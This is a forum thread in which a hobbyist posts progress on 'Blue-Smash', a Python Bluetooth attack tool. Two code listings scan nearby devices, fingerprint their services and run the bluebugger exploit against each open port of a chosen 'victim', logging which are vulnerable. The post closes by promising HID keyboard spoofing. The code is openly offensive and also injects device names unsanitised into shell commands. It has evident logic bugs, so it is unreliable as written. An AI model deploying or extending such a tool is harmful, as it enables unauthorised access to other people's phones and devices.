Hey guys
Sorry I haven't been around, I've just moved into my new flat over jan and have been decorating etc.
I've now got an internet connection and I am going to start work again on blue-track, but I'm going to change the name because of a snotty email lol
I will post more soon
Cheers
tH3 Gr33n5t3r
Well, sorry 'bout the last version of blue-track, did it actually work? lol. Well, I've changed the name to blue-smash, fixed everything that didn't work and done a general tidy up. Here is the new version.
Blue-Smash v1.0a
Looking into adding a sqlite db for autopwn etc and looking into a couple more exploits to add.
Enjoy
Hey again guys
First thing is that I've noticed yet more tyop's in my code, sorry. Spent a few hours testing everything and I am confident the next version will be much cleaner.
Next is I've started work on the autopwn function. I don't think I can get this to work exactly the same as Metasploit's because I do not have the skill. Instead I am going to code it so it checks all Bluetooth exploits against a chosen target and prints out a report that tells you if any of the exploits were successful.
In a future version I hope to add device type and manufacturer detection for a more targeted approach. Also planning a Bluetooth chat function and a Bluetooth virtual keyboard :P
I've done the scanning and profiling stuff and am now working on the exploit stuff.
If anybody spots anything a bit back to front or wrong let me know as I'm still learning
Code:
#### blue-smash autopwn ####
try:
    import os,time,sys
    from pysqlite2 import dbapi2 as sqlite
    from bluetooth import *
except ImportError, e:
    raise ImportError("Your system is missing some dependencies, Please read the README file.")

# scan for nearby devices
print "Blue-Smash Autopwn Function :p"
print "Scanning for devices......."
listno1 = 0
nearby_devices = discover_devices(lookup_names = True)

# create menu
for name, addr in nearby_devices:
    listno1 += (1)
    print "%s) %s - %s" % (listno1, name, addr)
victim = raw_input ("Choose a Number....:")

# create DB
if victim == '%s'% (listno1):
    if os.path.exists(name):
        print "DB already exists! Removing old DB......."
        os.system("rm %s" % (name))
    print "Creating sqlite DB %s" % (name)
    con1 = sqlite.connect (name)
    c = con1.cursor()
    c.execute('''CREATE TABLE fingerprint_results (
        id INTEGER PRIMARY KEY,
        name TEXT,
        port TEXT,
        status TEXT
        )''')
    services = find_service(address=name)
    if len(services) > 0:
        print "Blue-Smash found %d services on %s" % (len(services), name)
        print
    else:
        print "Sorry no services were found on %s :("% (name)
    for svc in services:
        print "Found %s on channel/PSM %s"% (svc["name"],svc["port"])
        c.execute('insert into fingerprint_results values (null, ?, ?, null)', (svc["name"],svc["port"]))
        con1.commit()
    print "Exploiting %s Stand by MwHaAhaA"% (name)
else:
    print "Error!!! Blue-Smash will now exit."
UPDATE
Sorry, noticed mods keep having to squeeze my post, my apologies
Just been playing around and came up with this little script. It scans for devices, finds all open ports, creates a DB, checks all ports to see if the device is vulnerable to the bluebugger exploit and saves this info to the DB. This is a bit untidy but works :P
Code:
# autopwn brainstorm
try:
    import os,time,sys
    from pysqlite2 import dbapi2 as sqlite
    from bluetooth import *
except ImportError, e:
    raise ImportError("Your system is missing some dependencies, Please read the README file.")

# define bluebugger test exploit
def exp_bluebugger():
    print "Creating temp RFCOMM Device"
    if not os.path.exists("/dev/rfcomm0"):
        os.spawnlp(os.P_WAIT,'mknod','mknod','/dev/rfcomm0','c','216','0')
    print "Starting Bluebugger..."
    con1 = sqlite.connect (name)
    c = con1.cursor()
    c.execute("select port from fingerprint_results order by port")
    print (svc["port"])
    auto_bluebugger=os.popen("bluebugger -c %s -o bluebugger.txt -a %s info "% (svc["port"],name))

# scan for devices
print "Blue-Smash Autopwn Function :p"
print "Scanning for devices......."
listno1 = 0
nearby_devices = discover_devices(lookup_names = True)
for name, addr in nearby_devices:
    listno1 += (1)
    print "%s) %s - %s" % (listno1, name, addr)
victim = raw_input ("Choose a Number....:")

# Create DB
if victim == '%s'% (listno1):
    if os.path.exists(name):
        print "DB already exists! Removing old DB......."
        os.system("rm %s" % (name))
    print "Creating sqlite DB %s" % (name)
    con1 = sqlite.connect (name)
    c = con1.cursor()
    c.execute('''CREATE TABLE fingerprint_results (
        id INTEGER PRIMARY KEY,
        name TEXT,
        port TEXT,
        status TEXT
        )''')
    # profile device
    services = find_service(address=name)
    if len(services) > 0:
        print "Blue-Smash found %d services on %s" % (len(services), name)
        print
    else:
        print "Sorry no services were found on %s :("% (name)
    fileno = 0
    for svc in services:
        fileno += (1)
        print "Found %s on channel/PSM %s"% (svc["name"],svc["port"])
        # Call exploit function
        exp_bluebugger()
        # check to see if port is vunerable & update DB
        vun_check = open("bluebugger.txt", "r")
        linelist = vun_check.readlines()
        vun_check.close()
        if len(linelist) > 6:
            c.execute('insert into fingerprint_results (id, name, port, status) values (null, ?, ?, ?)', (svc["name"],svc["port"], 'y'))
            con1.commit()
            print ":) is vulnerable"
        else:
            c.execute('insert into fingerprint_results (id, name, port, status) values (null, ?, ?, ?)', (svc["name"],svc["port"], 'n'))
            con1.commit()
            print ":( Not vulnerable"
        vun_check.close()
else:
    print "Error!!! target doesn't exist :D autopwn will now exit."
# EOF Biatch :P


Also want to start learning C. But it should include the bluetooth chat and hid keyboard function.
All you need is the master's MAC and one of the slave's and you are good to go.
